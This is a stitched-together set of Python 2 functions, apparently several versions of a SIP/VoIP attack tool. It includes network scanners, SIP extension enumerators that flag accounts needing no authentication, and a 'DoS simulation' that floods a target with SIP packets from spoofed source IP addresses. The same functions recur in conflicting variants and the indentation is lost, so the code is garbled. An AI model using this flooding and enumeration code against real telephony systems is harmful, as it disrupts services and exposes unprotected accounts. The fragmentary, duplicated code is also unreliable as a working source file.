def run(self):
global counter # notice how we use 'global' counter
global timeToExit
global workQueue
global queueLock
while not timeToExit:
queueLock.acquire()
if not workQueue.empty():
host = workQueue.get() # get host
queueLock.release() # when host is acquired, release the lock
# print(str(host))
sip = sip_packet.sip_packet(self.option,
host,
self.dest_port,
self.client_ip,
protocol="socket",
wait=True) # set options
result = sip.generate_packet() # generate packet.
if result["status"]:
if result["response"]['code'] == 200:
printResult(result, str(host))
counter += 1 # global counter changed
else:
queueLock.release() # when no jobs exist, release the lock
def networkScanner():
conf.verb = 0
client_ip = netifaces.ifaddresses(conf.iface)[2][0]['addr']
client_netmask = netifaces.ifaddresses(conf.iface)[2][0]['netmask']
print "[!] Network scan process started for {0}".format(
options.target_network)
targetNetwork = ipaddress.IPv4Network(unicode(options.target_network),
strict=False)
counter = 0
for machine in targetNetwork.hosts():
sip = sip_packet.sip_packet("options",
machine.exploded,
options.dest_port,
client_ip,
protocol="socket",
wait=True)
result = sip.generate_packet()
if result["status"]:
if result["response"]['code'] == 200:
utilities.writeFile(options.ip_list,
'{0}\n'.format(machine.exploded))
print "[+] New live IP found on {0}".format(machine.exploded)
counter += 1
print "[!] Network scan process finished and {0} live IP address(s) found.".format(
str(counter))
def dosSmilator():
conf.verb = 0
client_ip = netifaces.ifaddresses(conf.iface)[2][0]['addr']
client_netmask = netifaces.ifaddresses(conf.iface)[2][0]['netmask']
print("\033[33m[!] Client Interface: {0}".format(str(
conf.iface))) + "\033[0m"
print("\033[33m[!] Client IP: {0} ".format(str(client_ip))) + "\033[0m"
print "\033[94m[!] DoS attack simulation process started. \033[0m"
utilities.promisc("on", conf.iface)
i = 0
while i < int(options.counter):
try:
toUser = random.choice(
[line.rstrip('\n') for line in open(options.to_user)])
fromUser = random.choice(
[line.rstrip('\n') for line in open(options.from_user)])
spUser = random.choice(
[line.rstrip('\n') for line in open(options.sp_user)])
userAgent = random.choice(
[line.rstrip('\n') for line in open(options.user_agent)])
pkt = IP(dst=options.dest_ip)
client = pkt.src
if options.random and not options.library:
client = utilities.randomIPAddress()
if options.manual and not options.library:
client = random.choice([
line.rstrip('\n') for line in open(options.manual_ip_list)
])
if options.subnet and not options.library:
client = utilities.randomIPAddressFromNetwork(
client_ip, client_netmask)
send_protocol = "scapy"
if options.library:
send_protocol = "socket"
sip = sip_packet.sip_packet(str(options.dos_method),
str(options.dest_ip),
str(options.dest_port), str(client),
str(fromUser), str(toUser),
str(userAgent), str(spUser),
send_protocol)
sip.generate_packet()
i += 1
utilities.printProgressBar(i, int(options.counter), "Progress: ")
except (KeyboardInterrupt):
utilities.promisc("off", conf.iface)
print("Exiting traffic generation...")
raise SystemExit
print "\033[31m[!] DoS simulation finished and {0} packet sent to {1}...".format(
str(i), str(options.dest_ip)) + "\033[0m"
utilities.promisc("off", conf.iface)
def run(self):
global counter # extension counter
global timeToExit
global workQueue
global queueLock
# global prog_bar_counter
# global len_total
while not timeToExit:
queueLock.acquire()
if not workQueue.empty():
tn_ui = workQueue.get() # get host
queueLock.release() # when host is acquired, release the lock
target_network = tn_ui[0]
user_id = tn_ui[1]
# print("tn: {} - ui: {} - method: {}".format(target_network, user_id, self.option))
sip = sip_packet.sip_packet(self.option,
target_network,
self.dest_port,
self.client_ip,
from_user=user_id.strip(),
to_user=user_id.strip(),
protocol="socket",
wait=True)
result = sip.generate_packet()
# printProgressBar(prog_bar_counter, len_total, 'progress', 'completed')
# prog_bar_counter += 1
if result["status"]:
if not len(result["response"]):
print(
"\033[1;32m[+] New SIP extension found in {}: {},\033[0m \033[1;31mAuthentication not required!\033[0m"
.format(target_network, user_id))
counter += 1
elif result["response"]['code'] == 200:
print(
"\033[1;32m[+] New SIP extension found in {}: {},\033[0m \033[1;31mAuthentication not required!\033[0m"
.format(target_network, user_id))
counter += 1
elif result["response"]['code'] == 401:
print(
"\033[1;32m[+] New SIP extension found in {}: {}, Authentication required.\033[0m"
.format(target_network, user_id))
counter += 1
elif result["response"]['code'] == 403:
print(
"\033[1;32m[+] New SIP extension found in {}: {}, Authentication required.\033[0m"
.format(target_network, user_id))
counter += 1
else:
queueLock.release()
def sipnes_worker(run_event, option, dest_port, client_ip):
while not run_event.is_set():
global counter # notice how we use 'global' counter
global workQueue
host, from_user, to_user = workQueue.get() # get host
sip = sip_packet.sip_packet(option,
host,
dest_port,
client_ip,
from_user=from_user,
to_user=to_user,
protocol="socket",
wait=True) # set options
result = sip.generate_packet() # generate packet.
if result["status"]:
utilities.printResult(result, str(host), options.ip_list)
counter += 1 # global counter changed
def networkScanner():
conf.verb = 0
client_ip = netifaces.ifaddresses(conf.iface)[2][0]['addr']
client_netmask = netifaces.ifaddresses(conf.iface)[2][0]['netmask']
print "[!] Network scan process started for {0}".format(options.target_network)
targetNetwork = ipaddress.IPv4Network(unicode(options.target_network), strict=False)
counter = 0
for machine in targetNetwork.hosts():
sip = sip_packet.sip_packet("options", machine.exploded, options.dest_port, client_ip, protocol="socket", wait=True)
result = sip.generate_packet()
if result["status"]:
if result["response"]['code'] == 200:
utilities.writeFile(options.ip_list, '{0}\n'.format(machine.exploded))
print "[+] New live IP found on {0}".format(machine.exploded)
counter += 1
print "[!] Network scan process finished and {0} live IP address(s) found.".format(str(counter))
def dosSmilator():
conf.verb = 0
client_ip = netifaces.ifaddresses(conf.iface)[2][0]['addr']
client_netmask = netifaces.ifaddresses(conf.iface)[2][0]['netmask']
print ("[!] Client Interface: {0}".format(str(conf.iface)))
print ("[!] Client IP: {0} ".format(str(client_ip)))
utilities.promisc("on",conf.iface)
i = 0
while i < int(options.counter):
try:
toUser = random.choice([line.rstrip('\n') for line in open(options.to_user)])
fromUser = random.choice([line.rstrip('\n') for line in open(options.from_user)])
spUser = random.choice([line.rstrip('\n') for line in open(options.sp_user)])
userAgent = random.choice([line.rstrip('\n') for line in open(options.user_agent)])
pkt= IP(dst=options.dest_ip)
client = pkt.src
if options.random and not options.library:
client = utilities.randomIPAddress()
if options.manual and not options.library:
client = random.choice([line.rstrip('\n') for line in open(options.manual_ip_list)])
if options.subnet and not options.library:
client = utilities.randomIPAddressFromNetwork(client_ip, client_netmask)
send_protocol = "scapy"
if options.library:
send_protocol = "socket"
sip = sip_packet.sip_packet(str(options.dos_method), str(options.dest_ip), str(options.dest_port), str(client), str(fromUser), str(toUser), str(userAgent), str(spUser), send_protocol)
sip.generate_packet()
i += 1
utilities.printProgressBar(i,int(options.counter),"Progress: ")
except (KeyboardInterrupt):
utilities.promisc("off",conf.iface)
print("Exiting traffic generation...")
raise SystemExit
print "[!] DoS simulation finished and {0} packet sent to {1}...".format(str(i),str(options.dest_ip))
utilities.promisc("off",conf.iface)
def sipEnumerator():
conf.verb = 0
client_ip = netifaces.ifaddresses(conf.iface)[2][0]['addr']
client_netmask = netifaces.ifaddresses(conf.iface)[2][0]['netmask']
print("\033[33m[!] Client Interface: {0}".format(str(
conf.iface))) + "\033[0m"
print("\033[33m[!] Client IP: {0} ".format(str(client_ip))) + "\033[0m"
print "\033[94m[!] Enumeration process started. \033[0m"
user_list = utilities.readFile(options.from_user)
user_list = user_list.split("\n")
if len(user_list) <= 1:
print "\033[1;31;40m Error: From user not found. Please enter a valid From User list.\033[0m"
exit(0)
content = utilities.readFile("ip_list.txt")
content = content.split(";")
if len(content[0]) <= 1:
print "\033[1;31;40m Error: Target IP not found. Please run SIP-NES first for detect the target IPs.\033[0m"
exit(0)
content = content[0].split(";")
ext_counter = 0
for user_id in user_list:
sip = sip_packet.sip_packet("register",
content[0].strip(),
options.dest_port,
client_ip,
from_user=user_id.strip(),
to_user=user_id.strip(),
protocol="socket",
wait=True)
result = sip.generate_packet()
if result["status"]:
if result["response"]['code'] == 200:
print "\033[1;32m[+] New SIP Extension Found : " + user_id + ",\033[0m \033[1;31mAuthentication not required!\033[0m"
ext_counter = ext_counter + 1
if result["response"]['code'] == 401:
print "\033[1;32m[+] New SIP Extension Found : " + user_id + ", Authentication required.\033[0m"
ext_counter = ext_counter + 1
print "[!] " + str(ext_counter) + " SIP Extension Found."
def sipenum_worker(run_event, option, dest_port, client_ip):
while not run_event.is_set():
global counter # notice how we use 'global' counter
global workQueue
if workQueue.empty(): break
tn_ui = workQueue.get() # get host
target_network, user_id = tn_ui[0], tn_ui[1]
sip = sip_packet.sip_packet(option,
target_network,
dest_port,
client_ip,
from_user=user_id.strip(),
to_user=user_id.strip(),
protocol="socket",
wait=True)
result = sip.generate_packet()
if result["status"]:
if not len(result["response"]):
print((
"\033[1;32m[+] New SIP extension found in {}: {},\033[0m \033[1;31mAuthentication not required!\033[0m"
.format(target_network, user_id)))
counter += 1
elif result["response"]['code'] == 200:
print((
"\033[1;32m[+] New SIP extension found in {}: {},\033[0m \033[1;31mAuthentication not required!\033[0m"
.format(target_network, user_id)))
counter += 1
elif result["response"]['code'] == 401:
print((
"\033[1;32m[+] New SIP extension found in {}: {}, Authentication required.\033[0m"
.format(target_network, user_id)))
counter += 1
elif result["response"]['code'] == 403:
print((
"\033[1;32m[+] New SIP extension found in {}: {}, Authentication required.\033[0m"
.format(target_network, user_id)))
counter += 1
def dosSmilator():
value_errors = []
conf.verb = 0
try:
client_ip = netifaces.ifaddresses(conf.iface)[2][0]['addr']
client_netmask = netifaces.ifaddresses(conf.iface)[2][0]['netmask']
except ValueError:
value_errors.append(
'Please specify a valid interface name with --if option.')
message_type = options.message_type.lower(
) if options.message_type else "invite"
utilities.check_value_errors(value_errors)
utilities.promisc("on", conf.iface)
utilities.printInital("DoS attack simulation", conf.iface, client_ip)
i = 0
while i < int(options.counter):
try:
toUser = random.choice(
[line.rstrip('\n') for line in open(options.to_user)])
fromUser = random.choice(
[line.rstrip('\n') for line in open(options.from_user)])
spUser = random.choice(
[line.rstrip('\n') for line in open(options.sp_user)])
userAgent = random.choice(
[line.rstrip('\n') for line in open(options.user_agent)])
pkt = IP(dst=options.target_network)
client = pkt.src
if options.random and not options.library:
client = utilities.randomIPAddress()
if options.manual and not options.library:
client = random.choice([
line.rstrip('\n') for line in open(options.manual_ip_list)
])
if options.subnet and not options.library:
client = utilities.randomIPAddressFromNetwork(
client_ip, client_netmask, False)
send_protocol = "scapy"
if options.library:
send_protocol = "socket"
sip = sip_packet.sip_packet(str(message_type),
str(options.target_network),
str(options.dest_port), str(client),
str(fromUser), str(toUser),
str(userAgent), str(spUser),
send_protocol)
sip.generate_packet()
i += 1
utilities.printProgressBar(i, int(options.counter), "Progress: ")
except (KeyboardInterrupt):
utilities.promisc("off", conf.iface)
print("Exiting traffic generation...")
raise SystemExit
print((
"\033[31m[!] DoS simulation finished and {0} packet sent to {1}...\033[0m"
.format(str(i), str(options.target_network))))
utilities.promisc("off", conf.iface)
def networkScanner():
value_errors = []
conf.verb = 0
global counter
try:
client_ip = netifaces.ifaddresses(conf.iface)[2][0]['addr']
except ValueError:
value_errors.append(
'Please specify a valid interface name with --if option.')
message_type = options.message_type.lower(
) if options.message_type else "options"
if options.target_network == None:
value_errors.append(
'Please specify a valid target network with --tn option.')
if 'txt' in options.from_user:
from_user = [
userName
for userName in utilities.readFile(options.from_user).split("\n")
if userName.isalnum()
]
else:
from_user = [options.from_user]
if 'txt' in options.to_user:
to_user = [
userName
for userName in utilities.readFile(options.to_user).split("\n")
if userName.isalnum()
]
else:
to_user = [options.to_user]
if message_type == 'invite' or message_type == 'options':
pass # both fromUser and toUser should be accepted.
elif message_type == 'register' or message_type == 'subscribe':
to_user = [''] # toUser should be omitted
if 'txt' in options.from_user or '.txt' in options.to_user:
print(
"\033[33m\nYou gave a list of user names ('{}', '{}') for SIP-NES. This is yet an experimental feature. (WIP) \033[0m"
.format(options.from_user, options.to_user))
print(
"\033[33mIf this was not what you wanted, specify user names with '--to' and '--from' arguments \033[0m \n"
)
utilities.check_value_errors(value_errors)
if "-" in options.target_network:
host_range = options.target_network.split("-")
host, last = ipaddress.IPv4Address(unicode(
host_range[0])), ipaddress.IPv4Address(unicode(host_range[1]))
if ipaddress.IPv4Address(host) > ipaddress.IPv4Address(last):
value_errors.append(
"Error: Second IP address ({}) must bigger than first IP address ({})."
.format(ipaddress.IPv4Address(host),
ipaddress.IPv4Address(last)))
else:
target_networks = [
utilities.decimal_to_octets(host)
for host in range(int(ipaddress.IPv4Address(host)),
int(ipaddress.IPv4Address(last) + 1))
]
target_network__fromUser__toUser = [
(tn, fu, tu) for tn, fu, tu in itertools.product(
target_networks, from_user, to_user)
]
elif "/" in options.target_network:
target_networks = [
host
for host in ipaddress.IPv4Network(unicode(options.target_network),
strict=False).hosts()
]
target_network__fromUser__toUser = [
(tn, fu, tu) for tn, fu, tu in itertools.product(
target_networks, from_user, to_user)
]
elif len(from_user) > 1 or len(to_user) > 1:
print(
"\033[33mCalculating all permutations of target network ('{}'), from user name list ('{}') and to user name list ('{}').\033[0m"
.format(options.target_network, options.from_user,
options.to_user))
print(
"\033[33mDepending on the list sizes, this might take a long time.\033[0m \n"
)
target_network__fromUser__toUser = [
(tn, fu, tu) for tn, fu, tu in itertools.product(
[options.target_network], from_user, to_user)
]
utilities.check_value_errors(value_errors)
utilities.printInital("Network scan :", conf.iface, client_ip)
thread_join_time = 0.01
if '-' in options.target_network or '/' in options.target_network or (
len(from_user) > 1 or len(to_user) > 1): # Create new threads
run_event = threading.Event()
for _ in threadList:
thread = threading.Thread(target=sipnes_worker,
args=(run_event, message_type,
options.dest_port, client_ip))
thread.daemon = True
threads.append(thread)
_prompt_new = "\33[38;5;6m{} User names (to and from) will be checked for {} target networks.\nThere will be {} packages generated. Do you want to continue? (y/n)\33[0m\n"
try:
continue_flag = raw_input(
_prompt_new.format(
len(from_user) + len(to_user), len(target_networks),
len(target_network__fromUser__toUser)))
except EOFError:
print("STDIN is unavailable. Accepting answer as yes.")
continue_flag = 'y'
if continue_flag == 'n':
print("\33[38;5;6mTerminating by user input\33[0m")
run_event.clear()
exit(0)
elif continue_flag != 'y' and continue_flag != 'n':
print("\33[38;5;6mAnswer not understood. Please answer y/n.\33[0m")
run_event.clear()
exit(0)
for tn_fu_tu in target_network__fromUser__toUser:
workQueue.put(tn_fu_tu)
for thread in threads:
thread.start()
try:
while not workQueue.empty():
pass
except KeyboardInterrupt:
print("\nCTRL+C pressed, terminating SIP-NES gracefully")
run_event.set()
run_event.clear()
try:
for t in threads:
t.join(thread_join_time)
except KeyboardInterrupt:
print(
"\nCTRL+C pressed, but Mr. SIP is already trying to terminate SIP-NES gracefully. Please be patient."
)
for t in threads:
t.join(thread_join_time) # call the threads, finish
else:
if len(from_user) == 1 and len(to_user) == 1:
host = options.target_network
sip = sip_packet.sip_packet(message_type,
host,
options.dest_port,
client_ip,
from_user=from_user[0],
to_user=to_user[0],
protocol="socket",
wait=True)
result = sip.generate_packet()
if result["status"]: # and result["response"]['code'] == 200:
utilities.printResult(result, host, options.ip_list)
counter += 1
print((
"\033[31m[!] Network scan process finished and {0} live IP address(s) found.\033[0m"
.format(str(counter))))
def networkScanner():
conf.verb = 0
client_ip = netifaces.ifaddresses(conf.iface)[2][0]['addr']
client_netmask = netifaces.ifaddresses(conf.iface)[2][0]['netmask']
printInital("Network scan", conf.iface, client_ip)
dos_method = options.dos_method if options.dos_method else "options"
if '-' in options.target_network or '/' in options.target_network: # Create new threads
global counter
global timeToExit
counter = 0
threadID = 0
for threadName in threadList:
thread = ThreadSIPNES(threadID, threadName, dos_method,
options.dest_port, client_ip)
thread.start() # invoke the 'run()' function in the class
threads.append(thread)
threadID += 1
if "-" in options.target_network:
host_range = options.target_network.split("-")
host = ipaddress.IPv4Address(unicode(host_range[0]))
last = ipaddress.IPv4Address(unicode(host_range[1]))
if ipaddress.IPv4Address(host) > ipaddress.IPv4Address(last):
print(
"\033[1;31;40m Error: Second value must bigger than First value.\033[0m"
)
exit(0)
# Fill the queue with hosts
for host in range(ipaddress.IPv4Address(host),
ipaddress.IPv4Address(last) + 1):
workQueue.put(ipaddress.IPv4Address(host)) # work to do!
# finish up the work
while not workQueue.empty():
pass # Wait for queue
timeToExit = 1 # Notify threads
for t in threads:
t.join() # Wait for all threads to complete
elif "/" in options.target_network:
targetNetwork = ipaddress.IPv4Network(unicode(options.target_network),
strict=False)
# Fill the queue with for runners
for host in targetNetwork.hosts():
workQueue.put(host) # work to do!
# finish up the work
while not workQueue.empty():
pass # Wait for queue to empty
timeToExit = 1 # Notify threads it's time to exit
for t in threads:
t.join() # Wait for all threads to complete
else:
host = options.target_network
sip = sip_packet.sip_packet(dos_method,
host,
options.dest_port,
client_ip,
protocol="socket",
wait=True)
result = sip.generate_packet()
if result["status"] and result["response"]['code'] == 200:
printResult(result, host)
counter += 1
print(
"\033[31m[!] Network scan process finished and {0} live IP address(s) found.\033[0m"
.format(str(counter)))
def networkScanner():
conf.verb = 0
client_ip = netifaces.ifaddresses(conf.iface)[2][0]['addr']
client_netmask = netifaces.ifaddresses(conf.iface)[2][0]['netmask']
print("\033[33m[!] Client Interface: {0}".format(str(
conf.iface))) + "\033[0m"
print("\033[33m[!] Client IP: {0} ".format(str(client_ip))) + "\033[0m"
print "\033[94m[!] Network scan process started for {0}".format(
options.target_network) + "\033[0m"
counter = 0
if "-" in options.target_network:
host_range = options.target_network.split("-")
host = ipaddress.IPv4Address(unicode(host_range[0]))
last = ipaddress.IPv4Address(unicode(host_range[1]))
if ipaddress.IPv4Address(host) > ipaddress.IPv4Address(last):
print "\033[1;31;40m Error: Second value must bigger than First value.\033[0m"
exit(0)
while ipaddress.IPv4Address(host) <= ipaddress.IPv4Address(last):
sip = sip_packet.sip_packet("options",
host,
options.dest_port,
client_ip,
protocol="socket",
wait=True)
result = sip.generate_packet()
if result["status"]:
if result["response"]['code'] == 200:
printResult(result, str(host))
counter += 1
host = ipaddress.IPv4Address(host) + 1
elif "/" in options.target_network:
targetNetwork = ipaddress.IPv4Network(unicode(options.target_network),
strict=False)
for host in targetNetwork.hosts():
print host
sip = sip_packet.sip_packet("options",
host,
options.dest_port,
client_ip,
protocol="socket",
wait=True)
result = sip.generate_packet()
if result["status"]:
if result["response"]['code'] == 200:
printResult(result, str(host))
counter += 1
else:
host = options.target_network
sip = sip_packet.sip_packet("options",
host,
options.dest_port,
client_ip,
protocol="socket",
wait=True)
result = sip.generate_packet()
if result["status"]:
if result["response"]['code'] == 200:
printResult(result, host)
counter += 1
print "\033[31m[!] Network scan process finished and {0} live IP address(s) found.".format(
str(counter)) + "\033[0m"
